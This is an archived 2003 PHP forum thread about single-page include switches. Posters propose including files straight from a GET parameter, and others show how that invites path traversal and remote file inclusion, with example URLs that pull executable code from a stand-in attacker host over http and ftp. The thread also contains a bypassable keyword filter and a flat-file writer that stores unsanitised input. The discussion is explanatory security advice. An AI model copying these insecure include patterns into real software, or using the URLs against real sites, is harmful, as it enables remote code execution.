Page 1 of 2
Extending a single page management script
Posted: Mon Dec 15, 2003 8:16 pm
by Mobius Man
I've created a script (well, two different ones). The first one is for my index.php page, which is a simple include switch that keeps it to a single page design:
Code: Select all
<?php
ini_set('include_path', 'http://mobius_man.t35.com');
switch ($_GET['page']) {
case 'articles':
include('articles.php');
break;
case 'contact':
include('contact.php');
break;
case 'spotlight':
include('spotlight.php');
break;
case 'fan':
include('fan.php');
break;
case 'multimedia':
include('multimedia.php');
break;
case 'links':
include('links.php');
break;
case null:
include('./news/news.txt');
break;
default:
include('error.php');
break;
}
?>
That works fine. Secondly, I have a script that when I want to create pages for these pages (i.e. index -> articles -> page), it makes links on the selected page (articles.php for example). This is ok as well. The problem is, how can I include these links on the page as I do with the index.php and those branch files.
Basically I want the index ->articles.php ->page linked from articles.php to all be a single-page deal.
Posted: Mon Dec 15, 2003 8:35 pm
by McGruff
First, dynamic includes might be a better option than a switch / case - can be much quicker with many cases. You'd need to prefix file names for security if you are opening files based on values passed via GET:
Code: Select all
<?php
include('prefix_' . $_GET['page']);
?>
With the null & default cases:
Code: Select all
<?php
function loadPage()
{
if(is_null($_GET['page']))
{
// include .. etc
return;
}
if(!is_file('prefix_' . $_GET['page']))
{
// include .. etc
return;
}
include('prefix_' . $_GET['page']);
}
?>
This requires strict file naming conventions, of course.
I couldn't quite understand your query: are you making a front controller? Some recent discussion on this here
viewtopic.php?t=15107
Posted: Mon Dec 15, 2003 8:44 pm
by Mobius Man
Basically I'm trying to make a basic mangaer using flat files (I have no access to SQL).
This is the file that makes the links, and writes the information to the pages:
Code: Select all
<?php
include ("news/config.php");
$id = $_POST["id"];
$filename = $_POST["id"];
$date = date("F j, Y");
$name = $_POST["name"];
$email = $_POST["email"];
$title = $_POST["title"];
$content = $_POST["content"];
$pass = $_POST["password"];
if ($password == $pass)
{
$dir = "/" ;
opendir($dir);
$filename2 = 'articles.php';
$file = file_get_contents($filename2);
$fp = fopen($filename2, "w");
fwrite($fp, "<a href=articles/$id>$title</a> - $date <br /><br />");
fwrite($fp, $file);
fclose($fp);
closedir($dir);
chdir("articles");
$file = file_get_contents($filename);
$fp = fopen($filename, "w");
fwrite($fp, "<h1>$title</h1> Posted by: <a href=mailto:$email>$name</a> $date <br /><br /><br /><br /> $content</font> <br />");
fwrite($fp, $file);
fclose($fp);
?>
<html>
<head>
<title> Page Editor</title>
</head>
<body bgcolor="#6B859C">
<?php echo "<font face=$font size=$fontsize>";
echo "<center><h2>SUCCESS!!</h2></center>";
echo "<center>Your news has been successfully posted.<br />";
echo "Go To: <a href=$websiteurl>$websitename</a> | <a href=page_create.php>Make Another Post</a></center></font>";
?>
</body>
</html>
<?php }
else {
echo "Wrong Password <a href=news.php>Try again</a>.";
}
?>
Posted: Tue Dec 16, 2003 3:07 pm
by basdog22
instead of:
Code: Select all
<?php
ini_set('include_path', 'http://mobius_man.t35.com');
switch ($_GETї'page']) {
case 'articles':
include('articles.php');
break;
case 'contact':
include('contact.php');
break;
case 'spotlight':
include('spotlight.php');
break;
case 'fan':
include('fan.php');
break;
case 'multimedia':
include('multimedia.php');
break;
case 'links':
include('links.php');
break;
case null:
include('./news/news.txt');
break;
default:
include('error.php');
break;
}
?>
Do this:
Code: Select all
$file=$_GETї'page']
include "$file.php";
easier and safer.... I hope

Posted: Tue Dec 16, 2003 6:04 pm
by DuFF
basdog22 wrote:
easier and safer.... I hope

Easier, but
not safer. Anyone could just use the URL query to bring up any PHP file in the directory. Example:
http://mobius_man.t35.com/index.php?page=path/to/secret.php
Mobius Man, could you please explain what your problem is in more detail? I don't understand what you are having problems with.
Posted: Tue Dec 16, 2003 6:24 pm
by qads
you want to edit the files with php?

Posted: Wed Dec 17, 2003 12:42 am
by vigge89
you can use something like this:
Code: Select all
<?php
//Include content
if (isset($_GET['id'])) {
$id = "".addslashes($_GET['id']).".php";
if (file_exists($id)) {
include ($id); //Include chosen page
}
else {
include ("404.php"); //If the file requested does not exist
}
}
else {
include ("start.php"); //Default page
}
?>
Posted: Wed Dec 17, 2003 2:54 pm
by basdog22
Anyone could just use the URL query to bring up any PHP file in the directory
this can be handled with: sessions, referer trick etc

Posted: Wed Dec 17, 2003 5:24 pm
by Weirdan
DuFF wrote:basdog22 wrote:
easier and safer.... I hope

Easier, but
not safer. Anyone could just use the URL query to bring up any PHP file in the directory.
Even more, it could be used to include the script from remote host:
Code: Select all
http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
It will include(and execute) the script from http://evil.weirdan's.host.com/path/to/secret.php.
Posted: Thu Dec 18, 2003 12:38 am
by basdog22
http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
Never thought of that. thanks weirdan
but again:
Code: Select all
<?php
if (eregi("http://",$page))
{
echo "I don't like you!!!";
}
...
..
?>
wouldn't do the trick?
Posted: Thu Dec 18, 2003 2:34 am
by m3mn0n
lol There is nothing wrong with what he uses, I use the exact same thing. And on most servers I've tested the different page switchers, the difference in script execution is not even a hundredth of a second; so no biggie. And I prefer to define what pages are able to be called instead of allowing anything within a directory, based on the file name. Maybe he does too.
Regarding your article manager, what is wrong with what you're trying to do? And how can we help?
Posted: Thu Dec 18, 2003 3:14 pm
by Weirdan
basdog22 wrote:http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
Never thought of that. thanks weirdan
but again:
Code: Select all
<?php
if (eregi("http://",$page))
{
echo "I don't like you!!!";
}
...
..
?>
wouldn't do the trick?
it will. But then I'll change the url to:
Code: Select all
http://mobius_man.t35.com/index.php?page=ftp://evil.weirdan's.host.com/path/to/secret

use [php_man]basename[/php_man] function to get rid of traversals and xss attacks.
Posted: Thu Dec 18, 2003 3:38 pm
by Mobius Man
Wow! There's been a lot of posts since I was last on.
Basically, my problem is this. I want to include pages branching from a page off of index.php
For example:
index.php -> articles.php --- this works fine. However...
index.php -> articles.php -> a linked pages from articles.php ---
instead of being included on the same pages as articles.php, it goes directly to the file. I want everything to stay as it would in index.php.
Posted: Fri Dec 19, 2003 8:07 am
by m3mn0n
?p=articles which requires
articles.php; and within
articles.php, you require an article be called from the
GET method also. So the URL would be something like
?p=articles&id=2925.
Posted: Fri Dec 19, 2003 2:46 pm
by basdog22
weirdan
Thanks

basename rules
i will use it for another script i am working on. you can really play with this one
